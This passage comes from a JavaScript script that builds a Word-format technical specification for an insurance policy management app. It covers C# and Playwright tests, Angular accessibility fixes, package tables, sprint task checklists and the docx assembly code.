    '            InstallmentAmount = 500000,',
    '            StartDate = new DateTime(2025, 4, 1),',
    '            EndDate   = new DateTime(2035, 3, 31),',
    '        };',
    '        var result = InvokeProjectInstallments(',
    '            policy,',
    '            new DateTime(2025, 4, 1),',
    '            new DateTime(2026, 3, 31));',
    '',
    '        result.Count.Should().BeLessOrEqualTo(1);',
    '    }',
    '}',
  ]),
  spacer(200),

  h2("7.2  Backend — Integration Test: Auth Flow", "sec7-2"),
  ...codeBlock([
    'public class AuthIntegrationTests',
    '    : IClassFixture<WebApplicationFactory<Program>>',
    '{',
    '    private readonly HttpClient _client;',
    '',
    '    public AuthIntegrationTests(WebApplicationFactory<Program> factory)',
    '    {',
    '        _client = factory.WithWebHostBuilder(builder =>',
    '        {',
    '            builder.ConfigureServices(services =>',
    '            {',
    '                // Replace SQL Server with InMemory for tests',
    '                var descriptor = services.SingleOrDefault(',
    '                    d => d.ServiceType == typeof(DbContextOptions<AppDbContext>));',
    '                if (descriptor != null) services.Remove(descriptor);',
    '                services.AddDbContext<AppDbContext>(o =>',
    '                    o.UseInMemoryDatabase("TestDb"));',
    '            });',
    '        }).CreateClient();',
    '    }',
    '',
    '    [Fact]',
    '    public async Task Login_WithValidCredentials_ReturnsJwt()',
    '    {',
    '        // Arrange: seed a user first via /api/auth/register',
    '        var registerPayload = new {',
    '            FullName = "Test User",',
    '            Email    = "test@test.com",',
    '            Password = "Test@1234"',
    '        };',
    '        await _client.PostAsJsonAsync("/api/auth/register", registerPayload);',
    '',
    '        // Act',
    '        var loginPayload = new { Email = "test@test.com", Password = "Test@1234" };',
    '        var response = await _client.PostAsJsonAsync("/api/auth/login", loginPayload);',
    '',
    '        // Assert',
    '        response.StatusCode.Should().Be(HttpStatusCode.OK);',
    '        var result = await response.Content.ReadFromJsonAsync<ApiResponse<AuthResponseDto>>();',
    '        result!.Data.Token.Should().NotBeNullOrEmpty();',
    '    }',
    '}',
  ]),
  spacer(200),

  h2("7.3  Frontend — Playwright E2E Tests", "sec7-3"),
  ...codeBlock([
    '# Install Playwright',
    'npm init playwright@latest',
    '',
    '# playwright.config.ts',
    'export default defineConfig({',
    '    testDir: "./e2e",',
    '    baseURL: "http://localhost:4200",',
    '    use: { trace: "on-first-retry" },',
    '});',
  ]),
  spacer(),
  ...codeBlock([
    '// e2e/policy-crud.spec.ts',
    'import { test, expect } from "@playwright/test";',
    '',
    'test.beforeEach(async ({ page }) => {',
    '    await page.goto("/login");',
    '    await page.fill("#email", "admin@test.com");',
    '    await page.fill("#password", "Admin@123");',
    '    await page.click("button[type=submit]");',
    '    await expect(page).toHaveURL("/dashboard");',
    '});',
    '',
    'test("create policy → appears in list", async ({ page }) => {',
    '    await page.goto("/policies/new");',
    '',
    '    await page.fill("#policyHolderName", "Test Holder");',
    '    await page.fill("#formEmail",        "holder@test.com");',
    '    await page.selectOption("#policyTypeId",  "1");',
    '    await page.selectOption("#familyMemberId","1");',
    '    await page.fill("#premiumAmount", "12000");',
    '    await page.fill("#startDate",    "2025-04-01");',
    '    await page.fill("#endDate",      "2030-03-31");',
    '',
    '    await page.click("button[type=submit]");',
    '',
    '    // Should redirect to policy detail page',
    '    await expect(page).toHaveURL(/\\/policies\\/\\d+$/);',
    '    await expect(page.locator(".page-title"))',
    '        .toContainText("POL-");',
    '});',
    '',
    'test("mark policy as paid → next installment advances", async ({ page }) => {',
    '    await page.goto("/policies/1");',
    '    const initialDate = await page',
    '        .locator("[data-label=\'Next Installment\']").textContent();',
    '',
    '    await page.click("button:has-text(\'Pay\')");',
    '    await page.click("button:has-text(\'Confirm Payment\')");',
    '',
    '    await expect(page.locator("[data-label=\'Next Installment\']"))',
    '        .not.toContainText(initialDate!);',
    '});',
  ]),
  pageBreak(),
];

// ─── SECTION 8 — ACCESSIBILITY ─────────────────────────────────
const section8 = () => [
  h1("Section 8 — Accessibility Fixes", "sec8"),
  spacer(),

  h2("8.1  ARIA Labels on Icon Buttons", "sec8-1"),
  body("Every button that contains only an icon and no visible text must have an aria-label attribute. This applies to all .btn-icon buttons throughout the application."),
  makeTable(
    ["Component", "Element", "Add aria-label"],
    [
      ["policy-list", "Mark as Paid button", `aria-label="Mark policy as paid"`],
      ["policy-list", "View button", `aria-label="View policy details"`],
      ["policy-list", "Edit button", `aria-label="Edit policy"`],
      ["policy-detail", "Share button", `aria-label="Share policy"`],
      ["policy-detail", "Pay button", `aria-label="Record payment"`],
      ["navbar", "Notification bell", `aria-label="View notifications"`],
      ["navbar", "Logout button", `aria-label="Logout"`],
      ["family-members", "Edit member", `aria-label="Edit family member"`],
      ["family-members", "Delete member", `aria-label="Remove family member"`],
    ],
    [2400, 2600, 4360]
  ),
  spacer(200),

  h2("8.2  Form Error Accessibility", "sec8-2"),
  h3("Current pattern (non-accessible):"),
  ...codeBlock([
    '<input id="policyHolderName" class="form-control" formControlName="policyHolderName">',
    '<span class="form-error" *ngIf="...">Full name is required</span>',
  ]),
  h3("Corrected pattern:"),
  ...codeBlock([
    '<input',
    '    id="policyHolderName"',
    '    class="form-control"',
    '    formControlName="policyHolderName"',
    '    [attr.aria-invalid]="policyForm.get(\'policyHolderName\')?.invalid',
    '        && policyForm.get(\'policyHolderName\')?.touched"',
    '    aria-describedby="policyHolderName-error"',
    '>',
    '<span',
    '    id="policyHolderName-error"',
    '    class="form-error"',
    '    role="alert"',
    '    *ngIf="policyForm.get(\'policyHolderName\')?.invalid',
    '        && policyForm.get(\'policyHolderName\')?.touched"',
    '>',
    '    Full name is required',
    '</span>',
    '',
    '// Apply this same pattern to ALL form fields in:',
    '// policy-form.component.ts, register.component.ts, family-members.component.html',
  ]),
  spacer(200),

  h2("8.3  Modal Focus Trap", "sec8-3"),
  h3("New Directive: src/app/shared/directives/focus-trap.directive.ts"),
  ...codeBlock([
    'import { Directive, ElementRef, HostListener, OnInit } from "@angular/core";',
    '',
    '@Directive({ selector: "[appFocusTrap]", standalone: true })',
    'export class FocusTrapDirective implements OnInit {',
    '    private focusableSelectors = [',
    '        "button:not([disabled])", "input:not([disabled])",',
    '        "select:not([disabled])", "textarea:not([disabled])",',
    '        "a[href]", "[tabindex]:not([tabindex=\'-1\'])"',
    '    ].join(", ");',
    '',
    '    constructor(private el: ElementRef) {}',
    '',
    '    ngOnInit() {',
    '        // Focus the first focusable element on open',
    '        const first = this.el.nativeElement',
    '            .querySelectorAll(this.focusableSelectors)[0] as HTMLElement;',
    '        first?.focus();',
    '    }',
    '',
    '    @HostListener("keydown", ["$event"])',
    '    onKeyDown(event: KeyboardEvent): void {',
    '        if (event.key !== "Tab") return;',
    '        const focusable = Array.from<HTMLElement>(',
    '            this.el.nativeElement.querySelectorAll(this.focusableSelectors)',
    '        );',
    '        const first = focusable[0];',
    '        const last  = focusable[focusable.length - 1];',
    '',
    '        if (event.shiftKey && document.activeElement === first) {',
    '            event.preventDefault();',
    '            last.focus();',
    '        } else if (!event.shiftKey && document.activeElement === last) {',
    '            event.preventDefault();',
    '            first.focus();',
    '        }',
    '    }',
    '}',
    '',
    '// Add appFocusTrap to every modal-content div:',
    '// <div class="modal-content card-glass" appFocusTrap>',
  ]),
  spacer(200),

  h2("8.4  Skip to Content Link", "sec8-4"),
  h3("File: src/app/app.component.html — Add as first element in template"),
  ...codeBlock([
    '<a href="#main-content" class="skip-link">Skip to main content</a>',
    '<app-navbar></app-navbar>',
    '<main id="main-content" role="main">',
    '    <router-outlet></router-outlet>',
    '</main>',
    '<app-toast></app-toast>',
    '',
    '/* Add to styles.css: */',
    '.skip-link {',
    '    position: absolute;',
    '    top: -40px;',
    '    left: 0;',
    '    background: var(--brand-primary);',
    '    color: white;',
    '    padding: 8px 16px;',
    '    border-radius: 0 0 var(--radius-md) 0;',
    '    text-decoration: none;',
    '    font-weight: 600;',
    '    z-index: 99999;',
    '    transition: top 0.2s;',
    '}',
    '.skip-link:focus { top: 0; }',
  ]),
  pageBreak(),
];

// ─── SECTION 9 — PACKAGE REFERENCE ────────────────────────────
const section9 = () => [
  h1("Section 9 — Package Reference", "sec9"),
  spacer(),

  h2("9.1  NuGet Packages (Backend)", "sec9-1"),
  makeTable(
    ["Package", "Version", "Purpose", "Install Command"],
    [
      ["AspNetCoreRateLimit", "5.0.0", "Auth endpoint rate limiting", "dotnet add package AspNetCoreRateLimit"],
      ["MediatR.Extensions.Microsoft.DependencyInjection", "12.x", "CQRS command/query pattern", "dotnet add package MediatR.Extensions..."],
      ["EFCore.BulkExtensions", "8.x", "Bulk Excel import (500 rows in <200ms)", "dotnet add package EFCore.BulkExtensions"],
      ["Microsoft.Extensions.Caching.StackExchangeRedis", "8.x", "Redis distributed cache", "dotnet add package ...StackExchangeRedis"],
      ["Sentry.AspNetCore", "4.x", "Error monitoring & alerting", "dotnet add package Sentry.AspNetCore"],
      ["Polly", "8.x", "HTTP resilience — Gemini API retries", "dotnet add package Polly"],
      ["QuestPDF", "2024.x", "Tax summary PDF report generation", "dotnet add package QuestPDF"],
      ["Hangfire", "1.8.x", "Replace IHostedService scheduler", "dotnet add package Hangfire.SqlServer"],
      ["Asp.Versioning.Mvc", "8.x", "API versioning support", "dotnet add package Asp.Versioning.Mvc"],
      ["FluentAssertions", "6.x", "Expressive test assertions", "dotnet add package FluentAssertions"],
    ],
    [3000, 1200, 2760, 2400]
  ),
  spacer(200),

  h2("9.2  npm Packages (Frontend)", "sec9-2"),
  makeTable(
    ["Package", "Version", "Purpose", "Install Command"],
    [
      ["@ngrx/store", "17.x", "Predictable state management", "npm i @ngrx/store"],
      ["@ngrx/effects", "17.x", "Side effects for NgRx", "npm i @ngrx/effects"],
      ["@ngrx/entity", "17.x", "Normalised entity state", "npm i @ngrx/entity"],
      ["@ngrx/store-devtools", "17.x", "Time-travel debugging", "npm i @ngrx/store-devtools"],
      ["@angular/cdk/a11y", "17.x", "Focus management utilities", "Already in @angular/cdk"],
      ["@sentry/angular", "8.x", "Frontend error monitoring", "npm i @sentry/angular"],
      ["date-fns", "3.x", "Reliable date manipulation", "npm i date-fns"],
      ["zod", "3.x", "Runtime API response validation", "npm i zod"],
      ["@playwright/test", "1.x", "E2E browser testing", "npm i -D @playwright/test"],
    ],
    [2400, 1200, 2760, 3000]
  ),
  pageBreak(),
];

// ─── SECTION 10 — SPRINT CHECKLIST ────────────────────────────
const section10 = () => [
  h1("Section 10 — Sprint Delivery Checklist", "sec10"),
  body("Use this section as the definitive task list for each sprint. Each item maps directly to a section in this document for implementation details."),
  spacer(),

  h2("Sprint 1 — Security & Stability (Weeks 1–2)", "sec10-1"),
  makeTable(
    ["#", "Task", "Section Ref", "Owner", "Status"],
    [
      ["1.1", "Move secrets to User Secrets / env variables", "§1.1", "Backend", "☐"],
      ["1.2", "Add rate limiting on /api/auth/login and /register", "§1.2", "Backend", "☐"],
      ["1.3", "Restrict CORS to known production origins", "§1.3", "Backend", "☐"],
      ["1.4", "Add HTTPS redirect + security headers middleware", "§1.4", "Backend", "☐"],
      ["1.5", "Add Excel input sanitization for formula injection", "§1.5", "Backend", "☐"],
      ["1.6", "Split Services.cs into 7 individual service files", "§3.1", "Backend", "☐"],
      ["1.7", "Create PolicyConstants.cs and replace magic strings", "§3.2", "Backend", "☐"],
      ["1.8", "Add GlobalErrorHandler to Angular app.config.ts", "§3.3", "Frontend", "☐"],
      ["1.9", "Fix FamilyMemberService.GetByIdAsync null! return", "§3.4", "Backend", "☐"],
    ],
    [600, 4200, 1600, 1400, 1560]
  ),
  spacer(200),

  h2("Sprint 2 — Performance (Weeks 3–4)", "sec10-2"),
  makeTable(
    ["#", "Task", "Section Ref", "Owner", "Status"],
    [
      ["2.1", "Create sp_GetDashboardStats stored procedure", "§2.1", "Backend", "☐"],
      ["2.2", "Update DashboardService to use single SP call", "§2.1", "Backend", "☐"],
      ["2.3", "Add Redis and cache InvestmentForecastService", "§2.2", "Backend", "☐"],
      ["2.4", "Replace per-row AnyAsync with HashSet pre-load", "§2.3", "Backend", "☐"],
      ["2.5", "Implement BulkInsertAsync for Excel import", "§2.3", "Backend", "☐"],
      ["2.6", "Fix NotificationService subscription leak", "§2.4", "Frontend", "☐"],
      ["2.7", "Fix Chart destroy/recreate → use chart.update()", "§2.5", "Frontend", "☐"],
      ["2.8", "Change policy list default pageSize to 20", "§2.6", "Frontend", "☐"],
    ],
    [600, 4200, 1600, 1400, 1560]
  ),
  spacer(200),

  h2("Sprint 3 — Design System (Weeks 5–6)", "sec10-3"),
  makeTable(
    ["#", "Task", "Section Ref", "Owner", "Status"],
    [
      ["3.1", "Add DM Sans + DM Mono font imports to styles.css", "§6.1", "Frontend", "☐"],
      ["3.2", "Replace :root variables with 3-tier token system", "§6.1", "Frontend", "☐"],
      ["3.3", "Add card-data, card-hero, card-glass variant classes", "§6.2", "Frontend", "☐"],
      ["3.4", "Replace all .glass-card usages with correct variants", "§6.2", "Frontend", "☐"],
      ["3.5", "Create shared SpinnerComponent and replace all spinners", "§6.3", "Frontend", "☐"],
      ["3.6", "Create shared EmptyStateComponent and use in 5 routes", "§6.4", "Frontend", "☐"],
      ["3.7", "Update button sizes to new system (36px / 30px / 44px)", "§4.4 Enh. Doc", "Frontend", "☐"],
      ["3.8", "Fix mobile nav tap targets to 48px minimum", "§8.x", "Frontend", "☐"],
    ],
    [600, 4200, 1600, 1400, 1560]
  ),
  spacer(200),

  h2("Sprint 4 — Tax Intelligence (Weeks 7–8)", "sec10-4"),
  makeTable(
    ["#", "Task", "Section Ref", "Owner", "Status"],
    [
      ["4.1", "Create TaxSummaryDto and TaxLineItemDto", "§4.2.1", "Backend", "☐"],
      ["4.2", "Implement TaxIntelligenceService with 80C/80D logic", "§4.2.2", "Backend", "☐"],
      ["4.3", "Add /api/taxintelligence controller and endpoints", "§4.2.3", "Backend", "☐"],
      ["4.4", "Create tax-planner.component.ts Angular component", "§4.2.3", "Frontend", "☐"],
      ["4.5", "Add /tax-planner route to app.routes.ts", "§4.2.3", "Frontend", "☐"],
      ["4.6", "Add Tax Planner link to navbar navigation", "§4.2.3", "Frontend", "☐"],
    ],
    [600, 4200, 1600, 1400, 1560]
  ),
  spacer(200),

  h2("Sprint 5 — Portfolio Health Score (Weeks 9–10)", "sec10-5"),
  makeTable(
    ["#", "Task", "Section Ref", "Owner", "Status"],
    [
      ["5.1", "Create HealthScoreResultDto and HealthScoreFactor", "§4.1.1", "Backend", "☐"],
      ["5.2", "Implement PortfolioHealthScoreService (6 factors)", "§4.1.2", "Backend", "☐"],
      ["5.3", "Add /api/portfoliohealth endpoints", "§4.1.3", "Backend", "☐"],
      ["5.4", "Create PortfolioHealthGaugeComponent (SVG radial gauge)", "§4.1.4", "Frontend", "☐"],
      ["5.5", "Integrate gauge into dashboard.component.ts", "§4.1.4", "Frontend", "☐"],
      ["5.6", "Add per-factor breakdown expandable section below gauge", "§4.1.4", "Frontend", "☐"],
    ],
    [600, 4200, 1600, 1400, 1560]
  ),
  spacer(200),

  h2("Sprint 6 — AI Upgrade (Weeks 11–12)", "sec10-6"),
  makeTable(
    ["#", "Task", "Section Ref", "Owner", "Status"],
    [
      ["6.1", "Create GeminiOrchestratorService with 5-step pipeline", "§4.x Enh.", "Backend", "☐"],
      ["6.2", "Add confidence score to each extracted field", "§4.x Enh.", "Backend", "☐"],
      ["6.3", "Update verification modal to show confidence badges", "§4.x Enh.", "Frontend", "☐"],
      ["6.4", "Add /api/policies/ask natural language endpoint", "§4.x Enh.", "Backend", "☐"],
      ["6.5", "Create CommandPaletteComponent (Ctrl+K shortcut)", "§4.x Enh.", "Frontend", "☐"],
      ["6.6", "Add KeyboardShortcutService with shortcut registry", "§5.2 Enh.", "Frontend", "☐"],
    ],
    [600, 4200, 1600, 1400, 1560]
  ),
  spacer(200),

  h2("Sprint 7 — Infrastructure (Weeks 13–14)", "sec10-7"),
  makeTable(
    ["#", "Task", "Section Ref", "Owner", "Status"],
    [
      ["7.1", "Create backend Dockerfile (multi-stage build)", "§5.3", "DevOps", "☐"],
      ["7.2", "Create frontend Dockerfile (nginx serving)", "§5.3", "DevOps", "☐"],
      ["7.3", "Create docker-compose.yml (api, frontend, db, redis, seq)", "§5.3", "DevOps", "☐"],
      ["7.4", "Create .github/workflows/ci-cd.yml pipeline", "§5.4", "DevOps", "☐"],
      ["7.5", "Create xUnit test project with InMemory DB fixture", "§7.1", "Backend", "☐"],
      ["7.6", "Write InvestmentForecastService test suite", "§7.1.1", "Backend", "☐"],
      ["7.7", "Write Auth integration tests", "§7.2", "Backend", "☐"],
      ["7.8", "Set up Playwright and write policy CRUD e2e tests", "§7.3", "Frontend", "☐"],
    ],
    [600, 4200, 1600, 1400, 1560]
  ),
  spacer(200),

  h2("Sprint 8 — Advanced Features & Accessibility (Weeks 15–16)", "sec10-8"),
  makeTable(
    ["#", "Task", "Section Ref", "Owner", "Status"],
    [
      ["8.1", "Implement IrrCalculatorService with Newton-Raphson XIRR", "§4.4.1", "Backend", "☐"],
      ["8.2", "Add GET /api/policies/{id}/irr endpoint", "§4.4.2", "Backend", "☐"],
      ["8.3", "Display IRR with benchmark comparison on policy detail", "§4.4.2", "Frontend", "☐"],
      ["8.4", "Add aria-label to all icon-only buttons", "§8.1", "Frontend", "☐"],
      ["8.5", "Add aria-invalid + aria-describedby to all form fields", "§8.2", "Frontend", "☐"],
      ["8.6", "Create FocusTrapDirective and apply to all modals", "§8.3", "Frontend", "☐"],
      ["8.7", "Add skip-to-content link in app.component.html", "§8.4", "Frontend", "☐"],
      ["8.8", "WCAG contrast audit — fix text-muted on all surfaces", "§8.x Enh.", "Frontend", "☐"],
      ["8.9", "Add MediatR CQRS for CreatePolicy and MarkAsPaid", "§5.1", "Backend", "☐"],
      ["8.10", "Add 5-year forecast projection to InvestmentForecastService", "§2.7 Enh.", "Backend", "☐"],
    ],
    [600, 4200, 1600, 1400, 1560]
  ),
];

// ─── DOCUMENT ASSEMBLY ─────────────────────────────────────────
const doc = new Document({
  creator: "PolicyManager Engineering",
  title: "PolicyManager — Technical Modification Specification v3.0",
  description: "Detailed implementation guide for all modifications identified in the Enhancement Review",
  styles: {
    default: {
      document: { run: { font: "Arial", size: 20 } },
    },
    paragraphStyles: [
      {
        id: "Heading1", name: "Heading 1", basedOn: "Normal", next: "Normal", quickFormat: true,
        run: { size: 32, bold: true, font: "Arial", color: C.headerBg },
        paragraph: { spacing: { before: 400, after: 200 }, outlineLevel: 0 },
      },
      {
        id: "Heading2", name: "Heading 2", basedOn: "Normal", next: "Normal", quickFormat: true,
        run: { size: 26, bold: true, font: "Arial", color: C.indigo },
        paragraph: { spacing: { before: 320, after: 140 }, outlineLevel: 1 },
      },
      {
        id: "Heading3", name: "Heading 3", basedOn: "Normal", next: "Normal", quickFormat: true,
        run: { size: 22, bold: true, font: "Arial", color: C.slate600 },
        paragraph: { spacing: { before: 240, after: 100 }, outlineLevel: 2 },
      },
      {
        id: "Heading4", name: "Heading 4", basedOn: "Normal", next: "Normal", quickFormat: true,
        run: { size: 20, bold: true, font: "Arial", color: C.indigoDark },
        paragraph: { spacing: { before: 180, after: 80 }, outlineLevel: 3 },
      },
    ],
  },
  numbering: {
    config: [
      {
        reference: "bullets",
        levels: [{
          level: 0, format: LevelFormat.BULLET, text: "•", alignment: AlignmentType.LEFT,
          style: { paragraph: { indent: { left: 540, hanging: 260 } } },
        }, {
          level: 1, format: LevelFormat.BULLET, text: "◦", alignment: AlignmentType.LEFT,
          style: { paragraph: { indent: { left: 900, hanging: 260 } } },
        }],
      },
      {
        reference: "numbers",
        levels: [{
          level: 0, format: LevelFormat.DECIMAL, text: "%1.", alignment: AlignmentType.LEFT,
          style: { paragraph: { indent: { left: 540, hanging: 300 } } },
        }],
      },
    ],
  },
  sections: [
    {
      properties: {
        page: {
          size: { width: 12240, height: 15840 },
          margin: { top: 1260, right: 1260, bottom: 1260, left: 1260 },
        },
      },
      headers: {
        default: new Header({
          children: [
            new Paragraph({
              children: [
                new TextRun({ text: "PolicyManager — Technical Modification Specification v3.0", font: "Arial", size: 16, color: C.slate400 }),
                new TextRun({ text: "\t", font: "Arial" }),
                new TextRun({ text: "CONFIDENTIAL", font: "Arial", size: 16, bold: true, color: C.indigo }),
              ],
              tabStops: [{ type: "right", position: 9360 }],
              border: { bottom: { style: BorderStyle.SINGLE, size: 4, color: C.slate200 } },
            }),
          ],
        }),
      },
      footers: {
        default: new Footer({
          children: [
            new Paragraph({
              children: [
                new TextRun({ text: "© PolicyManager Engineering Team  |  For Internal Use Only  |  Page ", font: "Arial", size: 16, color: C.slate400 }),
                new TextRun({ children: [PageNumber.CURRENT], font: "Arial", size: 16, color: C.slate400 }),
                new TextRun({ text: " of ", font: "Arial", size: 16, color: C.slate400 }),
                new TextRun({ children: [PageNumber.TOTAL_PAGES], font: "Arial", size: 16, color: C.slate400 }),
              ],
              border: { top: { style: BorderStyle.SINGLE, size: 4, color: C.slate200 } },
            }),
          ],
        }),
      },
      children: [
        // Cover
        ...coverPage(),

        // TOC page
        new Paragraph({ heading: HeadingLevel.HEADING_1, children: [new TextRun({ text: "Table of Contents", font: "Arial", size: 32, bold: true, color: C.headerBg })] }),
        new TableOfContents("Table of Contents", { hyperlink: true, headingStyleRange: "1-2" }),
        pageBreak(),

        // Sections
        ...section1(),
        ...section2(),
        ...section3(),
        ...section4(),
        ...section5(),
        ...section6(),
        ...section7(),
        ...section8(),
        ...section9(),
        ...section10(),

        // Final note
        divider(),
        new Paragraph({
          alignment: AlignmentType.CENTER,
          spacing: { before: 200, after: 100 },
          children: [new TextRun({ text: "End of Technical Modification Specification v3.0", font: "Arial", size: 18, color: C.slate400, italics: true })],
        }),
        new Paragraph({
          alignment: AlignmentType.CENTER,
          children: [new TextRun({ text: "All modifications are cross-referenced to the PolicyManager Enhancement Review v2.0", font: "Arial", size: 17, color: C.slate400, italics: true })],
        }),
      ],
    },
  ],
});

Packer.toBuffer(doc).then(buf => {
  fs.writeFileSync("./PolicyManager_TechSpec_v3.docx", buf);
  console.log("Done");
});
